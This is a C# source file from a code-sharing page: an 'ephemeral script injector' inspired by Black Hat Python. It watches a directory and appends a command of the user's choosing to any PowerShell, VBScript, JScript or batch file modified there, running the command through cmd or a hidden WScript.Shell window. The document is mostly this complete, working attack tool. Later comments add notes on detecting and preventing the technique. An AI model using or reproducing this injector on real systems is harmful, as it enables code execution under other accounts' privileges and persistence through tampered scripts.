Last active
October 6, 2018 00:19
a small buggy utility inspired by chapter 10 of Black Hat Python by Justin Seitz
using System; | |
using System.IO; | |
using System.Text; | |
using System.Linq; | |
using System.Collections.Generic; | |
// ephemeral script injector by @3xocyte
// takes a target directory to watch and an OS command, and attempts to inject that command into any script that gets modified there
namespace FileContentInjector | |
{ | |
/// <summary>
/// Templates for payload injection: one text fragment per supported script type.
/// <c>Program.Main</c> specialises each one by replacing the literal token
/// <c>COMMANDGOESHERE</c> with the command given on the command line.
/// </summary>
/// <remarks>
/// Every template begins and ends with CRLF, so the fragment sits on a line of its own once it
/// has been appended to an existing script. The replacement is a plain string substitution;
/// nothing in this file quotes or escapes the command for the target language.
///
/// Detection note: the appended tail has a fixed shape per file type (a trailing
/// <c>cmd /c ...</c> line in a .ps1, a <c>WScript.Shell</c> Run call at the end of a .vbs or .js,
/// a bare command line at the end of a .bat). Content rules or file-integrity baselines that
/// compare a script with its known-good version will see it as added trailing lines.
///
/// NOTE(review): the members are mutable public fields, although nothing in this file
/// reassigns them after initialisation.
/// </remarks>
public static class PayloadTemplates
{
    // PowerShell (.ps1): passes the command to cmd.exe through "cmd /c".
    public static string ps1PayloadTemplate = "\r\ncmd /c COMMANDGOESHERE\r\n";
    // VBScript (.vbs): WScript.Shell Run with window style 0 (hidden window) and bWaitOnReturn = True.
    public static string vbsPayloadTemplate = "\r\nCreateObject(\"WScript.Shell\").Run \"COMMANDGOESHERE\", 0, True\r\n";
    // JScript (.js, Windows Script Host): WScript.shell run with no window-style or wait argument.
    public static string jsPayloadTemplate = "\r\nnew ActiveXObject(\"WScript.shell\").run(\"COMMANDGOESHERE\");\r\n";
    // Batch (.bat): the command itself, on its own line.
    public static string batPayloadTemplate = "\r\nCOMMANDGOESHERE\r\n";
}
/// <summary>
/// Console program that watches a single directory with <see cref="FileSystemWatcher"/> and,
/// when a file in it raises a Changed event, appends a command line to that file if its
/// extension is .ps1, .vbs, .js or .bat. Created, Deleted and Renamed events are only logged.
/// </summary>
/// <remarks>
/// All state is held in static fields that the watcher callbacks read and write without
/// synchronisation, so the behaviour depends on the order in which events arrive.
///
/// Defensive reading: the only capability the program uses is write access to files in the
/// watched directory, so what it demonstrates is the exposure created when scripts are staged in,
/// or run from, a location that another account can modify. Restrictive ACLs on such directories,
/// enforced script signing (for PowerShell, an AllSigned execution policy; an appended line
/// invalidates the signature), and file-integrity or EDR rules that flag a second process
/// appending to a script shortly after it was written each address that exposure.
/// </remarks>
class Program
{
    // Payload selected by the most recent injector() call; null when the extension is unsupported.
    // Static and shared, so it is overwritten on every call.
    static string injectedPayload = null;
    // Directory being watched; set from args[0] in Main.
    static string path = null;
    // to track injected files so we don't re-inject them and end up in an infinite loop
    // (the append performed by injector() itself raises another Changed event for the same file).
    // Entries are e.Name values, i.e. names relative to the watched directory, and are never removed.
    // NOTE(review): plain List<string> with no lock; FileSystemWatcher raises its events on
    // thread-pool threads when no SynchronizingObject is set, so access here is unsynchronised.
    static List<string> injectedFile = new List<string>();
    // Per-extension payloads, built once in Main from PayloadTemplates and the command in args[1].
    static string ps1Payload = null;
    static string vbsPayload = null;
    static string jsPayload = null;
    static string batPayload = null;

    /// <summary>
    /// Parses the two positional arguments, builds the per-extension payloads, lists the target
    /// directory, then starts the watcher and blocks until a key is pressed.
    /// </summary>
    /// <param name="args">args[0] is the directory to watch; args[1] is the command to append.</param>
    static void Main(string[] args)
    {
        try
        {
            path = args[0];
            Console.WriteLine("[*] path set: " + path);
            string placeholder = "COMMANDGOESHERE";
            string commandToRun = args[1];
            // The command is substituted verbatim into each template.
            ps1Payload = PayloadTemplates.ps1PayloadTemplate.Replace(placeholder, commandToRun);
            vbsPayload = PayloadTemplates.vbsPayloadTemplate.Replace(placeholder, commandToRun);
            jsPayload = PayloadTemplates.jsPayloadTemplate.Replace(placeholder, commandToRun);
            batPayload = PayloadTemplates.batPayloadTemplate.Replace(placeholder, commandToRun);
            if (Directory.Exists(path))
            {
                Console.WriteLine("[*] directory contents: ");
                Directory.GetFiles(path).ToList().ForEach(s => Console.WriteLine(s));
            }
            else
            {
                Console.WriteLine("[*] path not found");
                System.Environment.Exit(1);
            }
        }
        catch
        {
            // Bare catch: any exception raised in the block above (for example the
            // IndexOutOfRangeException from a missing argument) is reported as a usage error.
            Console.WriteLine("[*] usage: fileinjector.exe <directory> <command>");
            System.Environment.Exit(1);
        }
        // Both failure branches above exit the process, so this point is reached only when
        // the directory exists and both arguments were supplied.
        var watcher = new FileSystemWatcher();
        // add event handlers
        watcher.Created += watcher_Created;
        watcher.Changed += watcher_Changed;
        watcher.Deleted += watcher_Deleted;
        watcher.Renamed += watcher_Renamed;
        // Filter, NotifyFilter and IncludeSubdirectories are left at their defaults, so only
        // the top level of the directory is watched.
        watcher.Path = path;
        // get watching
        watcher.EnableRaisingEvents = true;
        Console.WriteLine("[*] watching files (press any key to exit)");
        // Blocks the main thread; the handlers keep running until a key is pressed.
        // The watcher is never disposed explicitly; the process simply ends.
        Console.ReadKey();
    }

    /// <summary>Logs a rename; takes no other action.</summary>
    private static void watcher_Renamed(object sender, RenamedEventArgs e)
    {
        Console.WriteLine("[*] file renamed: " + e.OldName + " to " + e.Name);
    }

    /// <summary>Logs a deletion; takes no other action.</summary>
    private static void watcher_Deleted(object sender, FileSystemEventArgs e)
    {
        Console.WriteLine("[*] file deleted: " + e.Name);
    }

    /// <summary>
    /// Logs the change and, unless the file name is already in <c>injectedFile</c>, calls
    /// <c>injector</c> and records the name when it reports success.
    /// </summary>
    private static void watcher_Changed(object sender, FileSystemEventArgs e)
    {
        Console.WriteLine("[*] file changed: " + e.Name);
        // A name stays in the list for the life of the process, so each file name is
        // appended to at most once per run.
        if (!injectedFile.Contains(e.Name))
        {
            if (injector(e.Name))
            {
                injectedFile.Add(e.Name);
            }
        }
    }

    /// <summary>
    /// Logs the new file together with the NTAccount name of its owner. No write is attempted
    /// from this handler; the injection call below is commented out.
    /// </summary>
    private static void watcher_Created(object sender, FileSystemEventArgs e)
    {
        string targetFile = path + "\\" + e.Name;
        // Reads the owner from the file's security descriptor. Presumably this is meant to show
        // which account is dropping files into the directory (verify against the author's intent).
        string fileOwner = File.GetAccessControl(targetFile).GetOwner(typeof(System.Security.Principal.NTAccount)).ToString();
        Console.WriteLine("[*] file created: " + e.Name + " owner: " + fileOwner);
        // if (!injectedFile.Contains(e.Name))
        // {
        // if (injector(e.Name))
        // {
        // injectedFile.Add(e.Name);
        // }
        // }
    }

    /// <summary>
    /// Selects the payload that matches the file's extension and appends it to the file.
    /// </summary>
    /// <param name="file">File name relative to the watched directory (the event's Name value).</param>
    /// <returns>
    /// true when the append completed; false when the extension is not one of
    /// .ps1, .vbs, .js or .bat, or when any exception occurred while writing.
    /// </returns>
    public static bool injector(string file)
    {
        // Path is built by string concatenation with a backslash rather than Path.Combine.
        string targetFile = path + "\\" + file;
        // ToLower() without a culture argument uses the current culture.
        string ext = Path.GetExtension(targetFile).ToLower();
        // The result is stored in the shared static field rather than a local.
        switch (ext)
        {
            case ".ps1":
                injectedPayload = ps1Payload;
                break;
            case ".vbs":
                injectedPayload = vbsPayload;
                break;
            case ".js":
                injectedPayload = jsPayload;
                break;
            case ".bat":
                injectedPayload = batPayload;
                break;
            default:
                injectedPayload = null;
                break;
        }
        if (!string.IsNullOrEmpty(injectedPayload))
        {
            Console.WriteLine("[*] attempting to inject payload");
            try
            {
                // currently trying to append, but FileMode.Create will overwrite
                // FileShare.ReadWrite lets the open succeed while other handles that permit
                // shared writing are still open on the file. StreamWriter(Stream) writes UTF-8,
                // whatever encoding the existing content uses; on a UTF-16 script that leaves a
                // mixed-encoding tail, which is itself an integrity-check artifact.
                using (FileStream fs = new FileStream(targetFile, FileMode.Append, FileAccess.Write, FileShare.ReadWrite))
                using (StreamWriter sw = new StreamWriter(fs))
                {
                    sw.Write(injectedPayload);
                    // Redundant inside the using block, which disposes the writer anyway.
                    sw.Close();
                }
                return true;
            }
            catch
            {
                // Bare catch: sharing violations, access-denied and missing-file errors all
                // collapse into the same message and a false return.
                Console.WriteLine("[!] could not inject payload");
                return false;
            }
        }
        else
        {
            return false;
        }
    }
}
} |